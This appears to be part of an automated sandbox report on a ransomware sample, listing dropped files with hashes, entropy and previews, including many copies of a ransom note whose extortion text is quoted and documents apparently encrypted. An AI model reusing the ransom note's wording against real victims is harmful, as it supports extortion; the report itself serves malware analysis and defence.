          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Public\Music\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Public\Pictures\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Public\Videos\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\Public\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\3D Objects\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\AppData\Local\Temp\xa288w44oi.bmp
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 32
          Category:dropped
          Size (bytes):5242934
          Entropy (8bit):5.58128370800569
          Encrypted:false
          SSDEEP:49152:Jbi7aDgY5uwMTQwa9LndLgwxKjvkmAdI0Lof1L083Z9juZ1:AAnLgwQNzfNs1
          MD5:0AD214961CB58BAAC27374BCB0E0F564
          SHA1:CC4E47C4CF146566E7508ABC0360D96CDF695A6C
          SHA-256:9C4BE9FB90DB1AEF7271C2CBA2B466C76D2ABC7B6B77FAABFFA4F05445586DD0
          SHA-512:F86085AC5C20B58D8B4BB450F3066250119998A90D2953C7B40750F2B5CB2D05923D57FCBD33A60D2751F0EC96D71B803487054832A685C87F02BE04CA65AE11
          Malicious:false
          Preview: BM6.P.....6...(............. .......P.............................................B...<...b...........H.......".......f.......7.......}...B...x...........................n...........u.......(...............$.......E...........V...I...U...........|...?...i...7...........+...:.......c...........................1..................._.......<...........-...N...}...F...8...........9...(...}.......-...7.......)...R...{...9...............K.......K...9...............^....... .......m...o...............+...........X...a...R.......V...].......;...V.......m...................U...P...+...#...y.......{.......?...!.......j...1.......p.......\...............................D...k...-...@...*...........{...{.......P.......-...C...q..."...........c.......b.......@...................P...........\.......{.......-...Q...f...................<.......!...............$...........>...l......./...j...........*...!...m...z...i...]...3...........d.......8...W...:...V...U...y.......5...z...T...n...................}.
          C:\Users\user\Contacts\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Desktop\CURQNKVOIX.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.84347141248344
          Encrypted:false
          SSDEEP:24:Dn5/1DIZtmNNJa5DptAFhy3eUC/nx90Hdu5Ni/EBMuJRN9nTDB8WzelXADn+zi3j:DnbN0+lQHdsp7N9nHou+Cj
          MD5:A7AD101B29D7135F454A791CEC428A8D
          SHA1:A2F8A6A6DAFB23916AE156D75B55A20659FE588F
          SHA-256:85AD56CBC03C7EF61559DBEA5313128EAF185EDB7493CA79B9F45274B115FD6D
          SHA-512:4C53D46B9DFF14D53641B52AFCA94AF83E5A81326721BD65D2F98D7A2A29739A63B84AB608CE38B0C609B6C8CCFC3FDC2781AD2A06AD5F3ABE639026E034EAEA
          Malicious:false
          Preview: ;.#?w+..dm..<q...............]....o.H.%-I....iu*..G........UQ...V..i.>,...:$X.].YXyQ.....F.ef..S...D/Z??d.=.G"e..o....y...k..J..6...........LH...K..Y.I..E.R*...^..A..E..n...;8...qq.[+!...Z....%?e./.#....4C..~m..J%w.2..#9...&t..Jo..~...YD.......U.....z.........a.6.Um3.......L..*\77......B..z{C.)...P..........x...X~.if....Y-.L.d..0....+]5:.`V...Q.300....Cz.6.c....rJH.._...>1.+.'.....+H.*. .V..f.$...HPkR.......+.......3..6J<.U.s8b.gl.:~....7..e.GD.g.jZ.X.O..Y..................Q{o.....`.7!..Q......LwJa.sZM{.*n..b.ya<.n..5.!.%..Ri.i....X........U..+Q.qM7?H..fe.3Nr..l...'`HP.....P74..$...........M..._...(.Z....... ...o...:{...N..4.[...6T(..f...Oh}.y..j...M..A.R....}..;Eh...........T.....[.f...iYN.<.S.....5..!].f.EKt..Nz..4AX.yD..ND..C.....LRn.G.d.G.!XI9.K....&(.F..".|[..wf......w.......).....{..E.........iR........P0Kda..A.3~.@.!..b..af......=Sj........'u.o....c.......ga......H.*.....a6...Q.l........Tg.Q..C..].C.X.C.Q...F.b.\..,..b.l.......jK..4...
          C:\Users\user\Desktop\EEGWXUHVUG\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Desktop\EOWRVPQCCS\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Desktop\FENIVHOIKN.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.862731619905376
          Encrypted:false
          SSDEEP:24:bQ6ZKUjnYusuvYlMbKnIGnOtsuLV7RVpriEe06lCpXADn+z9P:XJ/5vYebKnIGnOtsUVls0WGu+BP
          MD5:BA41FA871464041EF5F3DA922C8B973A
          SHA1:BC40D7ACA461EA074179698632EE3907E90D2E9B
          SHA-256:F85EA44817DE6877C79703CDCF4DC766D89429DEAA831E2E5D6076D2D3B75FFC
          SHA-512:9D45860CFFC535597547C8C7BD04A8D937F0B4AE8D62CDE6CEBD5FF40F2310447397F695465EABDE73375B2CE1FB470044ED8F40015338AC130C2B17CBBD9680
          Malicious:false
          Preview: .A...2#.u*<<.^C...{.?"J.xW0..X...]7/,...!.l)4..RI.'.J+!.W.....M..C(..r..=...P.=....K..P...'Q .u..)..=...:^.lY.-.."7.>.a}./...O.....]....* ........C....~S.k..).T[..y.....9.$...a,.m.......S.x.<(Tm...[.......w..AS..@.)..3.+,m].K..s.....a..p.k$'.X..+.X..M.vh3~xM.:TF4.?..?..b...#..<.......X....i....,.-...^..Wh...0.}..l9c...!.s.c..&.T.YB.o.....p.H...2........$.%....fE...e..b[4+.38.....EZf.hk....S.......!....9.B.Z.4/q.H&u.V.....S.......W:.Q....Y..*..F.#.V..5V...n........Y`l....G.fU....AY...CX...Nlm@8.....8z/o[..U~..+.P...3.N.I&......j3..{T.q.S....r;..O.a.@.........xg.0NpODZ..o.1.V[..r.@.M..... ...`..#D.f.y...{.f...D^D...i..........Q.......i4.(.>QJ...o..M.. !nP.V8>.....+....f...rI..)VI..V...M.J..]..ir..1...pf......3XV$p..J......3.P.k{}..U..\G...f.8...Y$..,s.}D...9....^....z.j>q1........!.f..>.p[.+...@#@x..C..]t.*l..y..Z#.5./|.e.j\.S..2.5..y.X.Qv.+N...`.S.....i<.P..)...J.^jO..S=..RrF.2U].....'...%......L1q.4I.y..{.....![..bS...-|.5.o...o.....B80.Bi3
          C:\Users\user\Desktop\FENIVHOIKN\CURQNKVOIX.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.839271363073904
          Encrypted:false
          SSDEEP:24:q/+5ohdPz20+lzAwYgBkcslzVzGGuXiJLyiTHXADn+zDBZIU:Q+MPzelzw9fzGVuT3u+J7
          MD5:6B3CF79188192A79CB78E6502FCF4533
          SHA1:FD2F8DF891063D60E397D88815EABB8372FE40D7
          SHA-256:19E8B6B0A8298C6AE267DADE16B36DD1728E4EAED411D82232DD6B33D9E801BB
          SHA-512:7B0B4AF17AAD8018DED19660DD81373066021C9B1225148137B93CC825D6F7571E0218A86D595E6367071BA0859E59CD80AB423480A7290170DA3C01E7B4C3FA
          Malicious:false
